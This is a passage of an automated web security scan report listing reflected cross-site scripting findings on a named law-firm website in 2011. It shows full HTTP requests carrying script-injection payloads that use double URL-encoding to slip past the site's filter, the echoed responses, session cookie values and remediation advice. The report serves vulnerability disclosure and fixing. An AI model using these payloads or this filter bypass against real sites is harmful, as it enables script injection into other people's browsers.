Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui9f482"><script>alert(1)</script>5de43e0d372/ui.theme.css" value="">
...[SNIP]...

4.187. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.theme.css20285"><script>alert(1)</script>9291800f59c" value="">
...[SNIP]...

4.188. http://www.wileyrein.com/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/index.cfm30fea"><script>alert(1)</script>818c7828cb8" value="">
...[SNIP]...

4.189. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="e7f23"><script>alert(1)</script>472c4d98eb6" value="1">
...[SNIP]...

4.190. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e"><script>alert(1)</script>3c700324221/jq.equalheights.js" value="">
...[SNIP]...

4.191. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jq.equalheights.jsf70d5"><script>alert(1)</script>0445fb7d91b" value="">
...[SNIP]...

4.192. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js67315"><script>alert(1)</script>635a97b6d45/jquery.js" value="">
...[SNIP]...

4.193. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jquery.jsd428a"><script>alert(1)</script>229db4da92d" value="">
...[SNIP]...

4.194. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsa0519"><script>alert(1)</script>056a75bdc24/menu.js" value="">
...[SNIP]...

4.195. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/menu.js72b32"><script>alert(1)</script>99218231cb0" value="">
...[SNIP]...

4.196. http://www.wileyrein.com/js/script.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js651f5"><script>alert(1)</script>51a543addfc/script.js" value="">
...[SNIP]...

4.197. http://www.wileyrein.com/js/script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/script.jsa9d57"><script>alert(1)</script>6a7d4ade41c" value="">
...[SNIP]...

4.198. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js2bbc8"><script>alert(1)</script>5280505d079/ui.core.js" value="">
...[SNIP]...

4.199. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.core.js79a0d"><script>alert(1)</script>713c91dcce2" value="">
...[SNIP]...

4.200. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js33f74"><script>alert(1)</script>75df592a80d/ui.datepicker.js" value="">
...[SNIP]...

4.201. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
